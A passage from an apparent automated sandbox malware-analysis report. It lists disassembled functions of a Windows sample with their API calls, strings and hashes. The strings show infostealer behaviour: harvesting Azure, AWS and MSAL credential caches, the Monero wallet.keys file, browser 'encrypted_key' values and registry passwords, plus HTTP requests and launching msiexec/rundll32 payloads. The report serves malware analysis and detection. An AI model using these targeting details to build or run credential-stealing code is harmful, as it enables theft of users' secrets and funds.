                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: b192725ca86ed822a3d45503fb24c8d1d9a1ebe8dd4342714e550cec4b1ac014
                              • Instruction ID: 2f76dd6762dfc22650fe39ab5d52e7e5db72742b1f89a6f90933ea79b3fa98d7
                              • Opcode Fuzzy Hash: b192725ca86ed822a3d45503fb24c8d1d9a1ebe8dd4342714e550cec4b1ac014
                              • Instruction Fuzzy Hash: F841837A9802086BDB50F770EC47FED3238EB64701F004454BA49660C1EEB45BCD9BB2
                              Function 00D49010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                              Download Yara Rule
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00D4906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: 66aa825dcaeeef74d3dd7408409f40339c72198b63bc5629636ff4380fae1a8c
                              • Instruction ID: 467379f12379f439309b1d0b38984706b9e439c126810e1446879a4cf97d29ae
                              • Opcode Fuzzy Hash: 66aa825dcaeeef74d3dd7408409f40339c72198b63bc5629636ff4380fae1a8c
                              • Instruction Fuzzy Hash: 8371DB75910208ABDB04EFE4DC99FEEB7B8EB88700F148508F519A7290DB74A945DB72
                              Function 00D42E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00D431C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00D4335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00D434EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 4d7cdd88a1996e290bef2fd469bc420f04a680bfe1234de91362a1dc86e2ed5f
                              • Instruction ID: f21428f49cd7ef8bf7c952c14d72570fda4a7d71f9ac2778a600bf3aa4f9a5ed
                              • Opcode Fuzzy Hash: 4d7cdd88a1996e290bef2fd469bc420f04a680bfe1234de91362a1dc86e2ed5f
                              • Instruction Fuzzy Hash: D812E971850118ABEB19EBA4DC92FEEB738EF14300F504159F50666192EF746B4ACFB2
                              Function 00D452C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                                • Part of subcall function 00D36280: InternetOpenA.WININET(00D50DFE,00000001,00000000,00000000,00000000), ref: 00D362E1
                                • Part of subcall function 00D36280: StrCmpCA.SHLWAPI(?,008DE4E0), ref: 00D36303
                                • Part of subcall function 00D36280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D36335
                                • Part of subcall function 00D36280: HttpOpenRequestA.WININET(00000000,GET,?,008DDA88,00000000,00000000,00400100,00000000), ref: 00D36385
                                • Part of subcall function 00D36280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00D363BF
                                • Part of subcall function 00D36280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D363D1
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D45318
                              • lstrlen.KERNEL32(00000000), ref: 00D4532F
                                • Part of subcall function 00D48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D48E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00D45364
                              • lstrlen.KERNEL32(00000000), ref: 00D45383
                              • lstrlen.KERNEL32(00000000), ref: 00D453AE
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 57bf14f3b015f5cc51893b7b48ec2f4e002c238fde2cd6765031ad430d67ce56
                              • Instruction ID: e01c59d9375ccb14bb49b967dcf183be5cab9bb966c77b2fb4cec14f3e8bbd9e
                              • Opcode Fuzzy Hash: 57bf14f3b015f5cc51893b7b48ec2f4e002c238fde2cd6765031ad430d67ce56
                              • Instruction Fuzzy Hash: E9514F309501489BEB18FF68DD92AED3779EF10305F504018F80A6B192EF34AB4ACB72
                              Function 00D412D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 1de34780a173fe27d4e3d28c688c6c2d194aa1ff52d9b229a27766678d7ba334
                              • Instruction ID: 03bf1fd0a21d3eeac162d64dfc6c6d9994983c89f43bcb9717069a998d694827
                              • Opcode Fuzzy Hash: 1de34780a173fe27d4e3d28c688c6c2d194aa1ff52d9b229a27766678d7ba334
                              • Instruction Fuzzy Hash: 4FC181B594021D9BCB14EF60DC89FEE7378FB64304F004598E50AA7241EA74EA85DFB2
                              Function 00D44280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00D442EC
                              • lstrcat.KERNEL32(?,008DDF38), ref: 00D4430B
                              • lstrcat.KERNEL32(?,?), ref: 00D4431F
                              • lstrcat.KERNEL32(?,008DCF28), ref: 00D44333
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D48D90: GetFileAttributesA.KERNEL32(00000000,?,00D31B54,?,?,00D5564C,?,?,00D50E1F), ref: 00D48D9F
                                • Part of subcall function 00D39CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00D39D39
                                • Part of subcall function 00D399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D399EC
                                • Part of subcall function 00D399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D39A11
                                • Part of subcall function 00D399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00D39A31
                                • Part of subcall function 00D399C0: ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D39A5A
                                • Part of subcall function 00D399C0: LocalFree.KERNEL32(00D3148F), ref: 00D39A90
                                • Part of subcall function 00D399C0: CloseHandle.KERNEL32(000000FF), ref: 00D39A9A
                                • Part of subcall function 00D493C0: GlobalAlloc.KERNEL32(00000000,00D443DD,00D443DD), ref: 00D493D3
                              • StrStrA.SHLWAPI(?,008DDE18), ref: 00D443F3
                              • GlobalFree.KERNEL32(?), ref: 00D44512
                                • Part of subcall function 00D39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34EEE,00000000,00000000), ref: 00D39AEF
                                • Part of subcall function 00D39AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00D34EEE,00000000,?), ref: 00D39B01
                                • Part of subcall function 00D39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34EEE,00000000,00000000), ref: 00D39B2A
                                • Part of subcall function 00D39AC0: LocalFree.KERNEL32(?,?,?,?,00D34EEE,00000000,?), ref: 00D39B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 00D444A3
                              • StrCmpCA.SHLWAPI(?,00D508D1), ref: 00D444C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00D444D2
                              • lstrcat.KERNEL32(00000000,?), ref: 00D444E5
                              • lstrcat.KERNEL32(00000000,00D50FB8), ref: 00D444F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: 1737412b6be6c221fdb546b5dc1c9a3808b11eee5c42bc64ae0da390aa0f43f1
                              • Instruction ID: 85d808dba6ff9c7c2728c32233cbd6c392c06fb9a4f58c6b412f82e6e7823c6f
                              • Opcode Fuzzy Hash: 1737412b6be6c221fdb546b5dc1c9a3808b11eee5c42bc64ae0da390aa0f43f1
                              • Instruction Fuzzy Hash: 16716876900208ABDB14FBA4DC95FEE7779EB88300F044598F60997181DA74DB49DFB2
                              Function 00D31310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D312A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D312B4
                                • Part of subcall function 00D312A0: RtlAllocateHeap.NTDLL(00000000), ref: 00D312BB
                                • Part of subcall function 00D312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00D312D7
                                • Part of subcall function 00D312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00D312F5
                                • Part of subcall function 00D312A0: RegCloseKey.ADVAPI32(?), ref: 00D312FF
                              • lstrcat.KERNEL32(?,00000000), ref: 00D3134F
                              • lstrlen.KERNEL32(?), ref: 00D3135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00D31377
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                                • Part of subcall function 00D48B60: GetSystemTime.KERNEL32(00D50E1A,008D9BB8,00D505AE,?,?,00D313F9,?,0000001A,00D50E1A,00000000,?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D48B86
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00D31465
                                • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                                • Part of subcall function 00D399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D399EC
                                • Part of subcall function 00D399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D39A11
                                • Part of subcall function 00D399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00D39A31
                                • Part of subcall function 00D399C0: ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D39A5A
                                • Part of subcall function 00D399C0: LocalFree.KERNEL32(00D3148F), ref: 00D39A90
                                • Part of subcall function 00D399C0: CloseHandle.KERNEL32(000000FF), ref: 00D39A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 00D314EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: 72398f68d8b9b71f321549ce3f882440669de69b072d5edd7fc709688a6ed5f6
                              • Instruction ID: 601eb34392c771e531b7e9f6cfbe200e126b9c93c720efc303f8151ab83eb3f5
                              • Opcode Fuzzy Hash: 72398f68d8b9b71f321549ce3f882440669de69b072d5edd7fc709688a6ed5f6
                              • Instruction Fuzzy Hash: FB512FB1D901195BDB15FB64DD92BED733CEF54304F404598B60AA2082EE306B8ACFB6
                              Function 00D375D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D372D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00D3733A
                                • Part of subcall function 00D372D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00D373B1
                                • Part of subcall function 00D372D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00D3740D
                                • Part of subcall function 00D372D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00D37452
                                • Part of subcall function 00D372D0: HeapFree.KERNEL32(00000000), ref: 00D37459
                              • lstrcat.KERNEL32(00000000,00D517FC), ref: 00D37606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00D37648
                              • lstrcat.KERNEL32(00000000, : ), ref: 00D3765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00D3768F
                              • lstrcat.KERNEL32(00000000,00D51804), ref: 00D376A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00D376D3
                              • lstrcat.KERNEL32(00000000,00D51808), ref: 00D376ED
                              • task.LIBCPMTD ref: 00D376FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: 7d343485202a4926a730b86ca5bf95cb56793ab4b397000ad290931cc87b2611
                              • Instruction ID: d065a23e2726e6dbd8d1f511213f5da41ddef5b2133168077adee27f917abe36
                              • Opcode Fuzzy Hash: 7d343485202a4926a730b86ca5bf95cb56793ab4b397000ad290931cc87b2611
                              • Instruction Fuzzy Hash: 9E314DB2900209DFCB54EBE4DC96DEE7775EB88302F144118F516A7290DA34A986EB72
                              Function 00D48100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,008DDD70,00000000,?,00D50E2C,00000000,?,00000000), ref: 00D48130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D48137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00D48158
                              • __aulldiv.LIBCMT ref: 00D48172
                              • __aulldiv.LIBCMT ref: 00D48180
                              • wsprintfA.USER32 ref: 00D481AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
